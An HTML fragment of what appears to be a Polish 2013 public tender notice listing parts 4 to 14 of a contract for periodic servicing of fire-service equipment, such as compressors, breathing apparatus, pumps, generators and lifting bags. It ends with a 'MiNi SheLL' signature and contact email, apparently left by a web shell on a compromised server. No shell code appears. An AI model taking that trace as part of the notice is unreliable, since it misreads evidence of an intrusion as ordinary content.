<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.41.32.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Przegląd  okresowy  kompresora elektrycznego do ładowania butli aparatów powietrznych Bauer Posejdon PE 3000 - TE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przegląd  okresowy  kompresora elektrycznego do ładowania butli aparatów powietrznych Bauer Posejdon PE 3000 - TE. Wymagany minimalny zakres czynności: Nazwa czynności:1)	wymiana filtra oczyszczania powietrza
2)	wymiana filtra wstępnego powietrza
3)	wymiana oleju
4)	sprawdzenie działania zaworu bezpieczeństwa
5)	sprawdzenie czystości powietrza zgodnie z normą PN-EN 12021
6)	wykonywanie przeglądu przez autoryzowany serwis
7)	dokonanie przeglądu poprawności działania przyrządów pomiarowych 
Wykonanie dwóch czynności w roku:maj, listopad
ilość sztuk-1
Zamówienie publiczne będzie realizowane w terminie do 30.11.2013 z uwzględnieniem cykli wyszczególnionych dla danego zadania i sprzętu zgodnie z Rozdziałem III SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.41.32.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Przegląd  okresowy  aparatów powietrznych nadciś.: FENZY AERIS, masek aparatów oraz butli kompozytowych oraz FENZY SPERIAN , masek aparatów  oraz butli kompozytowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przegląd  okresowy  aparatów powietrznych nadciś.: FENZY AERIS, masek aparatów oraz butli kompozytowych oraz FENZY SPERIAN , masek aparatów  oraz butli kompozytowych. Wymagany minimalny zakres czynności:Nazwa czynności:1)	sprawdzenie szczelności 
2)	konserwacja, badanie dynamiczne na sztucznym płucu, dezynfekcja, kontrola końcowa, dopuszczenie do użytku
3)	wykonanie przeglądu przez autoryzowany serwis
4)	dokonanie przeglądu poprawności działania przyrządów pomiarowych
Wykonanie dwóch czynności w roku:kwiecień, wrzesień
aparaty powietrzne nadciś. 1 butlowe FENZY AERIS, maski aparatów oraz butle kompozytowe - 30 szt.
aparaty powietrzne nadciś. 1 butlowe FENZY SPERIAN, maski aparatów oraz butle kompozytowe - 3 szt.
Zamówienie publiczne będzie realizowane w terminie do 30.11.2013 z uwzględnieniem cykli wyszczególnionych dla danego zadania i sprzętu zgodnie z Rozdziałem III SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.41.32.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Przegląd  okresowy:  pił spalinowych MS-290 STIHL oraz przecinarek  spalinowych do stali i betonu TS-400, TS-360, TS-760.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przegląd  okresowy:  pił spalinowych MS-290 STIHL oraz przecinarek  spalinowych do stali i betonu TS-400, TS-360, TS-760.Wymagany minimalny zakres czynności: Nazwa czynności:1)	wymiana filtra powietrza
2)	wymiana świec  zapłonowych
3)	sprawdzenie działania układu rozruchowego silnika
4)	sprawdzenie parametrów pracy silnika
5)	sprawdzenie działania hamulca bezpieczeństwa
6)	wymiana smoczka
7)	ostrzenie łańcucha
8)	regulacja naciągu łańcucha
9)	regulacja pracy silnika
wykonanie czynności raz w roku: sierpień
piły spalinowe MS-290 STIHL-13 szt.
Nazwa czynności:
1)	wymiana filtra powietrza
2)	wymiana świec zapłonowych
3)	sprawdzenie działania układu rozruchu silnika
4)	sprawdzenie parametrów pracy silnika
5)	sprawdzenie działania hamulca bezpieczeństwa
6)	wymiana smoczka
7)	weryfikacja paska klinowego
8)	sprawdzenie mocowania tarczy tnącej
9)	regulacja pracy silnika
wykonanie czynności raz w roku: sierpień
przecinarki spalinowe do stali i betonu TS-400	5 szt.
przecinarka spalinowa do stali i betonu TS-360	1 szt.
przecinarka spalinowa do stali i betonu TS-760	1 szt.
Zamówienie publiczne będzie realizowane w terminie do 30.11.2013 z uwzględnieniem cykli wyszczególnionych dla danego zadania i sprzętu zgodnie z Rozdziałem III SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.41.32.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Przegląd  okresowy :motopomp pożarniczych, pomp pływających, pompy szlamowej oraz autopompy i układu wodno pianowego w samochodach pożarniczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przegląd  okresowy :motopomp pożarniczych, pomp pływających, pompy szlamowej oraz autopompy i układu wodno pianowego w samochodach pożarniczych.
Wymagany minimalny zakres czynności: Nazwa czynności:1)	sprawdzenie szczelności autopompy
2)	przegląd autopompy - smarowanie
3)	przegląd skrzyni napędowej autopompy
4)	przegląd wału napędowego autopompy
5)	przegląd urządzenia zasysającego
6)	przegląd zaworu głównego
7)	przegląd zaworów tłocznych
8)	przegląd manometrów i manowakuometrów
9)	sprawdzenie instalacji elektrycznej i automatyki sterowania autopompy
10)	próba sprawności podzespołów wodno-pianowych, ciśnienia i wydajności autopompy
11)	wykonanie przeglądu przez autoryzowany serwis
12)	dokonanie przeglądu poprawności działania przyrządów pomiarowych
Wykonanie jednej czynności w roku:czerwiec
11 szt.- pompy i układ wodno pianowy w samochodach pożarniczych typu: STAR P142CJ A24/10, STAR 14.225 A20/10, JELCZ A32/10, STAR 244 A16/8, JELCZ 315 A32/8, STAR 12.227 Zigler FP 16/8
Nazwa czynności:
1)	sprawdzenie szczelności pompy
2)	przegląd elektroniki silnika
3)	sprawdzenie regulatora obrotów
4)	przegląd pompy
5)	przegląd pompy zasysającej
6)	wymiana oleju w regulatorze obrotów
7)	sprawdzenie gaźnika
8)	wymiana świec  zapłonowych
9)	wymiana filtra powietrza
10)	dokonanie próby szczelności i ciśnienia
11)	przegląd trokomatów
12)	wymiana filtra paliw
13)	wykonywanie przeglądu przez autoryzowany serwis
Wykonanie jednej czynności w roku:czerwiec
15 szt.-motopompy pożarnicze M8/8-1 silnik Kohler, M8/8 PO, pomp pływających NIAGARA 1 M4/2, Niagara Plus M4/2, Leda M8/2, Posejdon M8/2, pompa szlamowa KTH 80X Honda
Pompy i układ wodno pianowy w samochodach pożarniczych typu:	
STAR P142CJ A24/10	3 szt.
STAR 14.225 A20/10	1 szt.
JELCZ A32/10	2 szt.
STAR 244 A16/8	1 szt.
JELCZ 315 A32/8	1 szt.
STAR 12.227 Zigler Fp 16/8	3 szt.

Sprzęt:	
motopompy pożarnicze M8/8-1 silnik Kohler	4 szt.
motopompy pożarnicze  
M8/8 PO-7	2 szt.
pompy pływające 
Niagara 1 M4/2	2 szt.
pompa pływająca 
Niagara Plus M4/2	1 szt.
pompa pływająca 
Leda M8/2	1 szt.
Pompy pływające Posejdon M8/2	4 szt
Pompa szlamowa 
KTX 80X Honda 1 szt.
Zamówienie publiczne będzie realizowane w terminie do 30.11.2013 z uwzględnieniem cykli wyszczególnionych dla danego zadania i sprzętu zgodnie z Rozdziałem III SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.41.32.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Przegląd okresowy agregatów prądotwórczych GX 200 HONDA, ED -2400 GX 160 HONDA, FOGO FH5540, silnik Honda GX270.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przegląd okresowy agregatów prądotwórczych GX 200 HONDA, ED -2400 GX 160 HONDA, FOGO FH5540, silnik Honda GX270.Wymagany minimalny zakres czynności:Nazwa czynności:1)	przegląd elektroniki silnika
2)	wymiana świec zapłonowych
3)	wymiana filtra powietrza
4)	wymiana oleju w silniku
5)	wymiana filtra oleju
6)	sprawdzenie parametrów pracy silnika
7)	sprawdzenie parametrów  pod obciążeniem (moc max)
8)	sprawdzenie zabezpieczenia prądnicy
9)	kontrola gniazd wtykowych poboru energii
10)	wykonanie przeglądu przez autoryzowany serwis
11)	dokonanie przeglądu poprawności działania przyrządów pomiarowych
Wykonanie czynności raz w roku: czerwiec
Sprzęt:	
agregaty prądotwórcze 
GX 200 Honda	3 szt.
agregat prądotwórczy
ED - 2400 GX 160 Honda	1 szt.
 agregaty prądotwórcze
Fogo FH5540, silnik Honda GX270	2 szt.
Zamówienie publiczne będzie realizowane w terminie do 30.11.2013 z uwzględnieniem cykli wyszczególnionych dla danego zadania i sprzętu zgodnie z Rozdziałem III SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.41.32.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Przegląd okresowy agregatów prądotwórczych FOGO FV 5540X - silnik Briggs Stratton 9HP.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przegląd okresowy agregatów prądotwórczych FOGO FV 5540X - silnik Briggs Stratton 9HP. Wymagany minimalny zakres czynności: Nazwa czynności:
1)	przegląd elektroniki silnika
2)	wymiana świec zapłonowych
3)	wymiana filtra powietrza
4)	wymiana oleju w silniku
5)	wymiana filtra oleju
6)	sprawdzenie parametrów pracy silnika
7)	sprawdzenie parametrów  pod obciążeniem (moc max)
8)	sprawdzenie zabezpieczenia prądnicy
9)	kontrola gniazd wtykowych poboru energii
10)	wykonanie przeglądu przez autoryzowany serwis
11)	dokonanie przeglądu poprawności działania przyrządów pomiarowych
Wykonanie jednej czynności w roku: czerwiec
ilość  - 2 szt.
Zamówienie publiczne będzie realizowane w terminie do 30.11.2013 z uwzględnieniem cykli wyszczególnionych dla danego zadania i sprzętu zgodnie z Rozdziałem III SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.41.23.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Przegląd okresowy reduktorów do butli tlenowych z zestawu ratunkowego    PSP R-1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przegląd okresowy reduktorów do butli tlenowych z zestawu ratunkowego PSP R-1. 
Wymagany minimalny zakres czynności: nazwa czynności:1)	przegląd szczelności i wydajności dozowania tlenu
2)	dokonanie przeglądu poprawności działania przyrządów pomiarowych
Wykonanie jednej czynności w roku: kwiecień
ilość sztuk- 19
Zamówienie publiczne będzie realizowane w terminie do 30.11.2013 z uwzględnieniem cykli wyszczególnionych dla danego zadania i sprzętu zgodnie z Rozdziałem III SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.41.23.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Przegląd okresowy oraz kalibracja mierników gazów wybuchowych SCOTT 096-3264.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przegląd okresowy oraz kalibracja mierników gazów wybuchowych SCOTT 096-3264. Wymagany minimalny zakres czynności:Nazwa czynności:1)	przegląd i kalibracja
2)	wykonanie przeglądu przez autoryzowany serwis
Wykonanie jednej czynności w roku: wrzesień
ilość sztuk -5
Zamówienie publiczne będzie realizowane w terminie do 30.11.2013 z uwzględnieniem cykli wyszczególnionych dla danego zadania i sprzętu zgodnie z Rozdziałem III SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.41.23.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Przegląd okresowy poduszek niskociśnieniowych Vetter.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przegląd okresowy poduszek niskociśnieniowych Vetter. Wymagany minimalny zakres czynności: Nazwa czynności:1)	sprawdzenie szczelności, przegląd reduktorów 
i sterowników
2)	wykonanie przeglądu przez autoryzowany serwis
3)	dokonanie przeglądu poprawności działania przyrządów pomiarowych
Wykonanie jednej czynności w roku: wrzesień
Ilość kompletów - 2
Zamówienie publiczne będzie realizowane w terminie do 30.11.2013 z uwzględnieniem cykli wyszczególnionych dla danego zadania i sprzętu zgodnie z Rozdziałem III SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.41.23.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Przegląd okresowy poduszek wysokociśnieniowych Holmatro.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przegląd okresowy poduszek wysokociśnieniowych Holmatro. Wymagany minimalny zakres czynności: Nazwa czynności:1)	sprawdzenie szczelności, przegląd reduktorów 
i sterowników
2)	wykonanie przeglądu przez autoryzowany serwis
3)	dokonanie przeglądu poprawności działania przyrządów pomiarowych
Wykonanie jednej czynności w roku: wrzesień
Ilość kompletów -3
Zamówienie publiczne będzie realizowane w terminie do 30.11.2013 z uwzględnieniem cykli wyszczególnionych dla danego zadania i sprzętu zgodnie z Rozdziałem III SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.41.23.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com